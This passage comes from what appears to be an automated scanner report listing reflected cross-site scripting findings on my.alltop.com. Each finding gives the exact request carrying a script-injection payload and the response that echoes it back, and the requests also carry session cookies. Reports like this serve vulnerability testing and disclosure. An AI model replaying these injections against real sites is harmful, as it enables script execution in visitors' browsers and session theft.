Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:00 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)66da4"><script>alert(1)</script>b6fc588523a" method="post" accept-charset="utf-8">
...[SNIP]...

1.19. http://my.alltop.com/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feafe"><script>alert(1)</script>cbd239d3f08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)?feafe"><script>alert(1)</script>cbd239d3f08=1 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)?feafe"><script>alert(1)</script>cbd239d3f08=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.20. http://my.alltop.com/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45ea3"><script>alert(1)</script>bf8f40a85bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e45ea3"><script>alert(1)</script>bf8f40a85bb/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e45ea3"><script>alert(1)</script>bf8f40a85bb/" method="post" accept-charset="utf-8">
...[SNIP]...

1.21. http://my.alltop.com/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad76e"><script>alert(1)</script>a060fc7402 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/?ad76e"><script>alert(1)</script>a060fc7402=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:47 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/?ad76e"><script>alert(1)</script>a060fc7402=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.22. http://my.alltop.com/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fb2"><script>alert(1)</script>af0a3693816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker555a01dc7e30494e9aa81771d27cf02bc1fb2"><script>alert(1)</script>af0a3693816/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02bc1fb2"><script>alert(1)</script>af0a3693816/" method="post" accept-charset="utf-8">
...[SNIP]...

1.23. http://my.alltop.com/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d2e"><script>alert(1)</script>f6b21b62c05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/?47d2e"><script>alert(1)</script>f6b21b62c05=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/?47d2e"><script>alert(1)</script>f6b21b62c05=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.24. http://my.alltop.com/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a9fe"><script>alert(1)</script>0e9ecb2b17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a6a9fe"><script>alert(1)</script>0e9ecb2b17/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a6a9fe"><script>alert(1)</script>0e9ecb2b17/" method="post" accept-charset="utf-8">
...[SNIP]...

1.25. http://my.alltop.com/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d27"><script>alert(1)</script>e6d5411dcb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/?45d27"><script>alert(1)</script>e6d5411dcb8=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/?45d27"><script>alert(1)</script>e6d5411dcb8=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.26. http://my.alltop.com/alpha/a [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f64c"><script>alert(1)</script>6bc75d6c9d5 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E8f64c"><script>alert(1)</script>6bc75d6c9d5 HTTP/1.1
Host: my.alltop.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=160012002.1299617018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-414054026-1299617018360; alltop_v=5b0b0493d420fb34fe2dbc09755a84c8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; alltop_r=159_ALLTOP_TOPIC_ID_22441; __csv=62b61914aa0d8829; __csnv=3bbaea7f009e0cc0; __ctl=62b61914aa0d88291; __utma=160012002.1234645092.1299617018.1299617018.1299617018.1; __utmb=160012002.10.9.1299617157503; __qseg=Q_D|Q_T|Q_2891|Q_2782|Q_2781|Q_2369|Q_2361|Q_2360|Q_2359|Q_2358|Q_2357|Q_2356|Q_2342|Q_1213|Q_1153|Q_1152|Q_1151|Q_1150|Q_1145|Q_1144|Q_982

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=v515r1b50tmtvg1l5p6baknqe6; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:31 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=159_ALLTOP_TOPIC_ID_22441_68540; expires=Mon, 06-Jun-2011 20:50:31 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E8f64c"><script>alert(1)</script>6bc75d6c9d5" method="post" accept-charset="utf-8">
...[SNIP]...

1.27. http://my.alltop.com/alpha/a ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a

Issue detail

The value of the '"--></style></script><script>netsparker(0x000135)</script> request parameter is copied into the HTML document as plain text between tags. The payload a5039<script>alert(1)</script>01c425a7031 was submitted in the '"--></style></script><script>netsparker(0x000135)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a?'"--></style></script><script>netsparker(0x000135)</script>a5039<script>alert(1)</script>01c425a7031 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:05 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:05 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>a5039<script>alert(1)</script>01c425a7031" method="post" accept-charset="utf-8">
...[SNIP]...

1.28. http://my.alltop.com/alpha/a [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71875"><script>alert(1)</script>7227e96d4de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a71875"><script>alert(1)</script>7227e96d4de HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
